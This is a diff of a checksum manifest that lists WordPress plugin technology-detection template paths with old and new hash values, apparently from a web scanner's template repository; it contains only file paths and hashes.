+http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9df52d4dd2ad983b95d13d01fea04d7cb4ab9186 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:0efe2acb79d92e43fa27ee792d4a445f4da498f2 -http/technologies/wordpress/plugins/elementor.yaml:075b0eaf190ad5e07b7cc2ce6d15da4371304a9f -http/technologies/wordpress/plugins/elementskit-lite.yaml:f96f931d9114e6c50c582a0f4b55a8aeef11cf9b -http/technologies/wordpress/plugins/enable-media-replace.yaml:cfd487b799aed774eab97f87dd4beca2badc2a8d -http/technologies/wordpress/plugins/envato-elements.yaml:900c7cfca6b5ad9094a21de641bb8e7c09dedcf0 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:2fbe3fcb3a109eab37083c0ce2eef2e2ae4c73f0 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:e2833cfec91fa398f733fa5c7fd20f655a64dd19 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:5c630ddc25ea75968102b5be615133102f65623d -http/technologies/wordpress/plugins/fast-indexing-api.yaml:88958a991d8f65107a22b6efa0218c3addca4f5a -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:31ead4d39fadbc3f8f51bdae32da544c7621e243 -http/technologies/wordpress/plugins/flamingo.yaml:cabffa25c6b74c0fb96a850808efc17af8960e27 -http/technologies/wordpress/plugins/fluentform.yaml:45b3e3507dfb7537013958f1b1938486f11fb4db -http/technologies/wordpress/plugins/font-awesome.yaml:b9f79da55fe2e338677134b9469b27f8c533b7fa -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:ab286fe8d474744addd416fe694177c379b8adb2 -http/technologies/wordpress/plugins/formidable.yaml:061286a76e8413a9756d922d5194f7e0a65ea77d -http/technologies/wordpress/plugins/forminator.yaml:e97ae70c01240face06261a9f845348ace00535d -http/technologies/wordpress/plugins/ga-google-analytics.yaml:8e36c7424c04795162da1bc1834a8f818266be4e -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:6a46376b02ee5306a2f20ab7033f072daf7c539d -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:fdea706017e0db8cd8e9e4d0cc9fe17779681d87 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:b4eea842f7523c7e210167711d49f2e3526aaf79 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:0bf94e3ac16b15ceebbb256e69da1640f3e7f1c6 -http/technologies/wordpress/plugins/google-site-kit.yaml:c18fec58aa1ded2b835e2d7201687d89eb6e395c -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:646b7cb1fb9d863349d8b6ca8533e02cffd66bd8 -http/technologies/wordpress/plugins/gtranslate.yaml:c411195113f912afa9161125912e6a37d2962f5e -http/technologies/wordpress/plugins/gutenberg.yaml:0e9a8ac60beaa55c4d2d1f363d4f833113510a33 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:f7f0221d1f60d6f81ff3bfff8c5b342a8e8155f3 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:84f78e7fff0b60ee84c8188955a94fb3745ad5cc -http/technologies/wordpress/plugins/header-footer-elementor.yaml:7867117407e2df15683be3e1b07e41836d36ae75 -http/technologies/wordpress/plugins/header-footer.yaml:7669c8459c89b251840c38c0a984af4a71880909 -http/technologies/wordpress/plugins/health-check.yaml:aed888b41eb3744f0d3d5e0e358b202406809bc2 -http/technologies/wordpress/plugins/hello-dolly.yaml:bd3c195bb7b52f99492666ad723cbeebb4181104 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:5abaae0d471062ba8bfbc49584f99420b385b364 -http/technologies/wordpress/plugins/hostinger.yaml:085205e8fecbb363eb3761569677e0f9a751043f -http/technologies/wordpress/plugins/image-optimization.yaml:a34c72cf076e43b686893a6fa43bddd0764ac943 -http/technologies/wordpress/plugins/imagify.yaml:7379982e337b1d2ba55d8b15a826a0c8b1cd0390 -http/technologies/wordpress/plugins/imsanity.yaml:799da31660dcea941a50e0c864d0cbdd34970b99 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:c4e64f6e4a9790c57ea04e6b3202721290662ae4 -http/technologies/wordpress/plugins/instagram-feed.yaml:06c1b31b8e4327122c5852eff112036bb3eafe46 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f50ff24cc250751d04b1855285357bbd72ac7507 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:3c9a775ac2b46f4f6324a628d9c8579d3aff74f3 -http/technologies/wordpress/plugins/jetpack.yaml:7c86431be04ac1a6221fefbb83d7f2f4b502617e -http/technologies/wordpress/plugins/kadence-blocks.yaml:8325c2770e8f5ea58a8b4d4d76abea9fb0ff9302 -http/technologies/wordpress/plugins/kirki.yaml:45a1d73a1e202bcd32e919899e3b3576f13beb22 -http/technologies/wordpress/plugins/leadin.yaml:9789b925d06c78e4c9bacd5ffd124abaaf7284ab -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:12190d9f75ccebe1b916d722d4c1fbe3822329be -http/technologies/wordpress/plugins/limit-login-attempts.yaml:2ab47cc04451ffa9d2fb6b5cbc5e9394c26781c6 -http/technologies/wordpress/plugins/litespeed-cache.yaml:3ec74d723dfa9be2ed9347e9c6e8a0c4c14bb2f8 -http/technologies/wordpress/plugins/loco-translate.yaml:a7350b2f883e5d952aebf0e6b43f18ee9244a1c6 -http/technologies/wordpress/plugins/loginizer.yaml:723ba128e6f6f614f9374a6000f3eb6b7d4cebae +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b2b36f93092790fb749aff90eb816d0f2257765e -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:475c358317283c4ab74e86f026f4af65d831036c -http/technologies/wordpress/plugins/mailpoet.yaml:36632598b60cfb51cbbaa4a57684bd1421e5cc31 -http/technologies/wordpress/plugins/maintenance.yaml:ecbb5ce74c9d1aec6cdda9282f71f0b584023179 -http/technologies/wordpress/plugins/mainwp-child.yaml:01210f43653a3801d965ecc7ede11dd9cef138ef -http/technologies/wordpress/plugins/malcare-security.yaml:cdce76b1fdf36a07e2dae705e0be8f87ca240985 -http/technologies/wordpress/plugins/megamenu.yaml:e63cf2f31eb6976c6aa9a529c33391061e9aab74 -http/technologies/wordpress/plugins/members.yaml:1453ab0f4f96b42f315bd072cc2767bde66694da -http/technologies/wordpress/plugins/meta-box.yaml:7cc79d5cc817974dae0d9c45759f03fa95440d0b -http/technologies/wordpress/plugins/metform.yaml:0e9e3ff5a97337e55b935684061b03e0f404cc2c -http/technologies/wordpress/plugins/ml-slider.yaml:38ebf507f1a692dcb03078b92a6b99aed805827b -http/technologies/wordpress/plugins/newsletter.yaml:4862cd8a417ce395a8abb63d2ef362804b1183ab -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:08490d87cf71e80f70d41d07bb0dc27818b8331c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:c314a17a12150a7f83081de290549e9233ef7ec3 -http/technologies/wordpress/plugins/ninja-forms.yaml:b043099ac616b288cb3a23e9524a48a6f199766d -http/technologies/wordpress/plugins/ocean-extra.yaml:6caac7cea926f1f1e42d2395da5199a6666406ba -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:353e654021b5a26d8c1ec3bcf1626d287491869b -http/technologies/wordpress/plugins/one-click-demo-import.yaml:7b8ea058ca4b27936808174d200a1e60196ca3a0 -http/technologies/wordpress/plugins/optinmonster.yaml:83663131314272425ba1cb88f287384a26aa8668 -http/technologies/wordpress/plugins/otter-blocks.yaml:e8a0ed3724fd0e1f9cdbbc018e90ae85f0e505db -http/technologies/wordpress/plugins/password-protected.yaml:02f493156cf9cfc2c96d91fc27ddce6543fdd0de -http/technologies/wordpress/plugins/pdf-embedder.yaml:475edf2c715b2260b00eb8866b7f243f43e39e46 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:974b88a88765f7a1a8f64ede8e32db580178e0ca -http/technologies/wordpress/plugins/pixelyoursite.yaml:dff9f562335307a4b93a530a975442df92a8428e -http/technologies/wordpress/plugins/polylang.yaml:8a78c4f36849c0b2a029aee3cec3a598cfff7ba8 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:4fa3385cedabf7add168b6596d0dc79c0ee1a30f -http/technologies/wordpress/plugins/post-smtp.yaml:0f9797f4da021f45de0710c7e1c557026e81bbf2 -http/technologies/wordpress/plugins/post-types-order.yaml:ee09985c7d83e7cc8e2459e450a470b506f1ed10 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:1bb17affaf189134c2bfaead1fd37fc59809198f -http/technologies/wordpress/plugins/pretty-link.yaml:2e585abe4c1fc10b57915e250887d5c8e7cabd6e -http/technologies/wordpress/plugins/really-simple-captcha.yaml:253317c6609ff8f784bb453b8529706e0d2c2d3d -http/technologies/wordpress/plugins/really-simple-ssl.yaml:3257aac50801d6df3fa1ced1a324396a3cc86743 -http/technologies/wordpress/plugins/redirection.yaml:83bc9cfb08baf937e486328b30bbfae410b01795 -http/technologies/wordpress/plugins/redux-framework.yaml:3f4a9330ffe914352446f63d828c6409882137cd -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:f83a5f00172df37eb2a5185f38c8898e3daddd28 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:2c7c8a757b577539bb1259fe0249919705f39641 -http/technologies/wordpress/plugins/safe-svg.yaml:a49c3a50635e2056153e428a2fc6a4cead28a32b -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:01dcb978dcea997996aa4b29702a0cf3ba7254ce -http/technologies/wordpress/plugins/sg-cachepress.yaml:6bc39e60652d6cda06db95e83e01d21649f254d5 -http/technologies/wordpress/plugins/sg-security.yaml:8054658b173dfb77b988ebff8c940de0ac400b37 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c6eed26f66e6c4072af32d672cd64860c53ae63e -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:23c88c8ee9e4fdff3280cf6611a35c20ae9216dd -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:abad4f06dbe63a132b80ab0c4440c3ecbc78eb6e -http/technologies/wordpress/plugins/simple-history.yaml:841dce087f50e2987921cd0040c5d6b27e9d3340 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1213ff348ec456d53dd649a5bea24c90934822ac -http/technologies/wordpress/plugins/siteorigin-panels.yaml:cc0a76850b8bdc64d3285ceb97646221d5d51049 -http/technologies/wordpress/plugins/smart-slider-3.yaml:96eb9799d770ef5d30512e66c3440bcd120a7090 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2ec9633ca5100cecd5182105c82e3497c212da08 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:de7c3bfde45638ef5a619f0a9884f13b0e99c8f9 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d6810436217b53d0982cdc39fff36eeed64a8423 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:b18d89e4655ae1c25d78acfd2a0820c23dd1c536 -http/technologies/wordpress/plugins/svg-support.yaml:0c5d5a30e9991dc5262ca553b76189449aefe7b7 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:5e717a7d63b8808e0161622e735bd4d933be6f4f -http/technologies/wordpress/plugins/tablepress.yaml:70a1b6fe5b80b311fd26aaa4ff4e2c1f6ff7a6c0 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4fd03e0372203e0f4d455ee83d9878e11a6e7205 -http/technologies/wordpress/plugins/templately.yaml:eed9c843f65424989ef953c84ef2942efc3722ca -http/technologies/wordpress/plugins/the-events-calendar.yaml:b507a2b35453a26d8068d49c9f4dba574899f83d +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:352ce17c3530648f0c8f4e9c154c23511c8514e3 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:f8f822418ea63a3156f3a12f92427f5ff08e619b -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:66f97aa22fc7dab7899d946771586f119d026099 -http/technologies/wordpress/plugins/under-construction-page.yaml:c7123c39b1f28e3b5c05e7e90452a69a12289785 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:916e18c4c940f310d7f41fee57688741cdcf47a6 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:3539198758804fde75775c11f43e81ebeff72955 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:52f17fba29e7b8dc93eaa069298fb7c3d65d3d14 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:3d4575faefc127bd612072cf6d4180c8fce5e383 -http/technologies/wordpress/plugins/webp-express.yaml:44ef44ab9f8e30c05805c113da7bb21df83e06dc -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:515bcd87d0c3529a1678d173340661ca1f1a4979 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:f204753bfe78a04f80044bae283d9ca8e6b8abf8 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:7de1cee7a6d20bf8e18e090d0ec2a7e9fd112146 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:bc72ae051588e4d6095f1e456c9db387ca1eb327 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:294c7434abee8899fcf7907b347dd8da78c6da63 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:aa2012c7b220df9304c5e7136f0a65151b05e799 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:6cbd2c37290c72dd168f5ecf2e1809cef400492f -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:5d2df892fb2ac54cfde6df099f5c02ad00bcdae3 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bcb05ad7ca6a68175730f60dc541b2e681215521 -http/technologies/wordpress/plugins/woocommerce-services.yaml:d6c77cbedfe424f47227bd0c19412866ebd925cf -http/technologies/wordpress/plugins/woocommerce.yaml:666e01577b8f949e9bb77d0c80a9559ac1276f7a -http/technologies/wordpress/plugins/wordfence.yaml:91c28e9577ab467b6a3e5f0c8ebb743a408e7049 